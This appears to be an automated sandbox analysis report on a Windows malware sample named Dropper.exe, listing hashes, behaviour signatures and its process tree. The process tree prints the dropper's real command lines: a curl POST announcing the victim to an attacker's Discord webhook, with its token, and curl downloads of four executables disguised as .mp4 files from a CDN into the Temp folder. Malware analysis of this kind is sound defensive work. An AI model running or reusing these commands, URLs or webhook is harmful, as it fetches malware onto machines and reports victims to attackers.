Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-06-2024 08:16

General

  • Target

    Dropper.exe

  • Size

    12KB

  • MD5

    13eb5be5584766a9f95d058b74c01fae

  • SHA1

    859b917932b9ce6610a5eb90c315cfd4f728f200

  • SHA256

    58d82fcd47e89b187c3d6aa5ab70d5ea876968d223490ac1b3b24e4c71715292

  • SHA512

    ea1fc5c2c8b0194863b8bf68a4d432b269ac666bcd6d8dd65b1e2d5e4e1926ccc9b013e42f39f100b99ba106253d85c33d1ac6ec89d51f8023b73444fa3a5a6e

  • SSDEEP

    384:pHPELyODmB7q9bJnz6PbQGw+pfolHfhhDd4VCsw:1EmO6s9bJMbK/hhDawsw

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
    "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
      "C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
        3⤵
          PID:2592
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
          3⤵
            PID:2664
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
            3⤵
              PID:2792
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
              3⤵
                PID:2556
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                3⤵
                  PID:2720

            Network

            MITRE ATT&CK Matrix ATT&CK v13

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/1312-0-0x000000007436E000-0x000000007436F000-memory.dmp
              Filesize

              4KB

            • memory/1312-1-0x0000000001070000-0x000000000107A000-memory.dmp
              Filesize

              40KB

            • memory/2640-2-0x00000000742E0000-0x00000000749CE000-memory.dmp
              Filesize

              6.9MB

            • memory/2640-3-0x00000000742E0000-0x00000000749CE000-memory.dmp
              Filesize

              6.9MB